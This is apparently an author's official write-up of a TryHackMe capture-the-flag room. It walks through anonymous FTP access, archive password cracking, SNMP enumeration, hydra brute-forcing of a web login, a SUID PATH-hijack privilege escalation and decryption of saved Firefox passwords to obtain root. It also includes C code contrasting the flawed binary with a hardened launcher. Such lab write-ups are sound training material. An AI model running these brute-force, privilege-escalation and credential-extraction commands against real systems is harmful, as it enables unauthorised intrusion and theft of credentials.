Expense Expedition Official Writeup (TryHackMe)
This is the official write-up of the Expense Expedition CTF room on TryHackMe.
Enumeration
Using Rustscan to scan the TCP ports:
rustscan -a [IP] -- -A
FTP Enumeration
From our Rustscan result, we found out that FTP has anonymous login enabled!
- First, let’s turn off passive mode.
- Then, list the files in the FTP server.
- We see a cs.rar file, let’s download it to our machine.
ftp anonymous@[IP]
ftp> passive
ftp> ls
ftp> get cs.rar
Let’s extract the contents of the RAR file. The archive is password-protected, so let’s brute force the password with John the Ripper:
rar2john cs.rar > hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt
Extracting the RAR file with the recovered password, we get a cs.txt file. Let’s read it:
unrar x cs.rar
cat cs.txt
SNMP Enumeration
If you knew about the SNMP protocol, you would’ve quickly got the hint! The “SNMP community string” is like a user ID or password that allows access to a router’s or other device’s statistics. SNMP community strings are used only by devices that support the SNMPv1 and SNMPv2c protocols.
First, let’s confirm whether the SNMP port (UDP 161) is open:
nmap [IP] -sU -p 161 -Pn -T5
Let’s enumerate SNMP with the community string from cs.txt. I will use the tool snmp-check:
snmp-check [IP] -c somaiya
We find out some important details:
- Hostname: somaiya
- Username: dhruv
So there’s a user “dhruv” on the system, but we still don’t have its password yet!
HTTP Enumeration
We need to fuzz for subdirectories. I’ll be using ffuf for this:
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt -u http://192.168.1.100/FUZZ -ic -c
We find an uncommon directory named expense. Visiting it, we find an expense-tracking website. Moving down the page, we find another user, “aaryan”.
Now we have 2 users:
- aaryan
- dhruv
Clicking on the login section at the top of the page, we find the login page too. Let’s brute force both usernames for their passwords.
Using hydra to brute force the password:
hydra [IP] http-post-form -l dhruv -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou-70.txt "/expense/login2.php:username=^USER^&password=^PASS^&login=Login:F=Username/Password Incorrect" -F -t 40
Although we couldn’t brute force aaryan’s password, we found the password for dhruv! Logging in just provides us with a dashboard page with expense and report categories, nothing fishy! Let’s use these credentials for logging into the system using SSH!
Gaining Access
ssh dhruv@[IP]
cat user.txt
Privilege Escalation
Horizontal Privilege Escalation
Let’s enumerate for SUID binaries. One of them is /opt/path. When we run it, it pings localhost. Let’s run strings on the binary to find out what it does internally:
strings /opt/path
Found the vulnerability! The binary calls ping by a relative path, not an absolute one, so we can abuse the PATH variable to perform privilege escalation:
export PATH=/tmp:$PATH
echo "/bin/sh" > /tmp/ping
chmod 777 /tmp/ping
/opt/path
Awesome, we have successfully changed the user ID (uid)! Although we aren’t root yet, we can enumerate as the “aaryan” user for vertical privilege escalation!
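To show why this worked and how the binary should have been written, here is an added example (not the room’s code, and the real contents of /opt/path are assumed; only the relative “ping” call is what strings revealed): the vulnerable system() pattern beside a hardened launcher that uses an absolute path, a fixed environment and no shell.

```c
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/wait.h>

/* Vulnerable pattern (the flaw strings(1) exposed in /opt/path): system()
 * runs via /bin/sh, which resolves the bare word "ping" through the
 * CALLER's PATH, so the caller chooses which "ping" gets SUID privileges. */
int ping_vulnerable(void) { return system("ping -c 1 127.0.0.1"); }

/* Trusted only if absolute (never PATH-resolved) and free of ".." components. */
int is_trusted_path(const char *p)
{
    if (p == NULL || p[0] != '/')
        return 0;
    for (const char *s = p; *s; s++)
        if (s[0] == '/' && s[1] == '.' && s[2] == '.' && (s[3] == '/' || !s[3]))
            return 0;
    return 1;
}

/* Hardened pattern: no shell, absolute path, fixed minimal environment (the
 * caller's PATH, LD_PRELOAD, etc. are discarded). Returns the child's exit
 * status or -1. The original would call it with "/bin/ping" and its argv. */
int run_trusted(const char *abs_path, char *const argv[])
{
    char *const clean_env[] = { "PATH=/usr/sbin:/usr/bin:/sbin:/bin", NULL };
    int status;
    if (!is_trusted_path(abs_path))
        return -1;
    pid_t pid = fork();
    if (pid == 0) {
        execve(abs_path, argv, clean_env);
        _exit(127);                       /* execve only returns on error */
    }
    if (pid < 0 || waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

/* Self-check needing only /bin/sh: ask it to exit with a known code. */
int run_trusted_sh_exit(int code)
{
    char cmd[32];
    snprintf(cmd, sizeof cmd, "exit %d", code);
    char *const argv[] = { "/bin/sh", "-c", cmd, NULL };
    return run_trusted("/bin/sh", argv);
}
```

With run_trusted, prepending /tmp to PATH has no effect, because the child never consults the caller’s environment and the helper is always resolved from an absolute path.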
Vertical Privilege Escalation
When we move to the home directory of the “aaryan” user, we find a hidden .mozilla directory. This directory holds the Firefox profile, which includes the saved passwords!
- Copy the entire directory onto our machine
- We will use a tool called firefox_decrypt to decrypt the passwords
- Usage:
mv .mozilla/ mozilla/
python firefox_decrypt.py mozilla/
Congrats, we found the root password!
su root
cat /root/root.txt
And that is the entire machine pwned! Hope you enjoyed solving this CTF, it’s my first and one of many to come! Until then, auf wiedersehen!